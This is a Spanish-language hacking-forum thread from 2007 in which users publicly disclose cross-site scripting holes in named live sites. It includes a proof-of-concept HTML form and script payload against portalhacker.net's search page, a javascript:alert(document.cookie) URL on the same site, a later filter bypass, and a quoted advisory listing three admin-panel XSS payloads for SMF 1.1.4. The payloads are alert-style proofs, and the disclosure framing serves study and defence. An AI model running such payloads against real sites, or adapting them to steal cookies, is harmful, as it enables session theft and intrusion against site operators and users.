XSS en PortalHacker.net

Iniciado por WHK, 2 Noviembre 2007, 00:54 AM

0 Miembros y 2 Visitantes están viendo este tema.

WHK

Hace tiempo encontré algunos XSS en elhacker.com y .org pero aún no los reparan a pesar del tiempo que llevan y de que fueron publicados y avisados. Ahora portalhacker.net también tiene un XSS localizado en el buscador de la pagina principal.

PoC:
Código (html4strict) [Seleccionar]
<form name="buscarform" action="http://www.portalhacker.net/buscar.php" method="post">
<input name="buscar" type="hidden" value="ok">
<input name="query" type="text" size=12 value="Pon tu XSS acá">
<input type="submit" value="Enviar"></form>

Donde puse "Pon tu XSS acá" prueba con enviar la siguiente petición post: "<script>alert(/xss/);</script>"

Después se quejan del porqué les roban las cookies.

Freeze.

Si no me equivoco (Y creo que no) es un Bug en los Smf 1.1.4 ;) ;) ;) ;)

WHK

#2
NO..... ese buscador no es propio del foro, el XSS de SMF es otro mas :P al final tienen como 4 XSS incluyendo web y foro pero la diferencia es que los que tu dices son solo locales y tendrías que tener derechos sobre el foro para crear los XSS, este que yo digo cualquiera puede crearlo.

Freeze.

Umm ok..!

Ahora si te doy la razon. xD xD xD
"Despues se quejan"




Por cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!

WHK

#4
CitarPor cierto no sabes de donde bajo el parche para el XSS q presenta el 1.1.4...!!

No hay aún pero no te preocupes ya que no son remotos a menos que se incluya un CSRF aunque dudo mucho que SMF sea vulnerable a eso.

Supongo que te refieres a este:
Citar_____________________________________________________________________
_______
|                                                                            |
| __________.__                 __   __________               __             |
| \______   \  | _____    ____ |  | _\______   \ ____   _____/  |_  ______   |
|  |    |  _/  | \__  \ _/ ___\|  |/ /|       _//  _ \ /  _ \   __\/  ___/   |
|  |    |   \  |__/ __ \\  \___|    < |    |   (  <_> |  <_> )  |  \___ \    |
|  |______  /____(____  /\___  >__|_ \|____|_  /\____/ \____/|__| /____  >   |
|         \/          \/     \/     \/       \/                        \/    |
|----------------------------------------------------------------------------|
|                                                                            |
|    http://www.blackroots.it                  staff[at]blackroots[
dot]it      |
|                                                                            |
|    Autore : The-Dark_Man && Bled                                           |
|____________________________________________________________________________|

##############################################################################
#                                                                            #
#                               XSS smf 1.1.4                                #
#                                                                            #
##############################################################################
 
Found Xss in the administration...
 
1----------------------
Go to http://link/[path]/index.php?action=news
Modify the news and insert
<script>alert('Xss')</script>
Save the news! no an alert will be generated in every page!

2---------------------
Go to http://link/[path]/index.php?action=manageboards
Create a new forum with Title:
<script>alert('Xss')</script>
result? XSS  ;)

3---------------------
Go here http://link/[path]/index.php?action=membergroups;
Modify or create a new gruop and name it:
<script>alert('Xss')</script>
;)

----------------------
The-Dark_Man && Bled of blackroots.it

WHK

Nuevamente portalhacker tiene un nuevo xss:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);

Parece que ese foro se ha descuidado muchisimo, ojala que no le pase lo mismo que a otro que le robaron el dominio por un xss.

Deja mucho de que hablar en cuanto a la calidad del servidor y del estado de la misma página.

¿Será mala administración?

Freeze.

Es increible que un foro de 'hacking' descuide tanto su web/foro :P

NadiceJMA

parece que ya repararon el bug....

Thor

No lo han reparado del todo, la página busca la palabra "javascript" pero... solo en minúsculas, esto sigue funcionando:
http://foro.portalhacker.net/url.php?urlc=javascript:alert(document.cookie);

sirdarckcat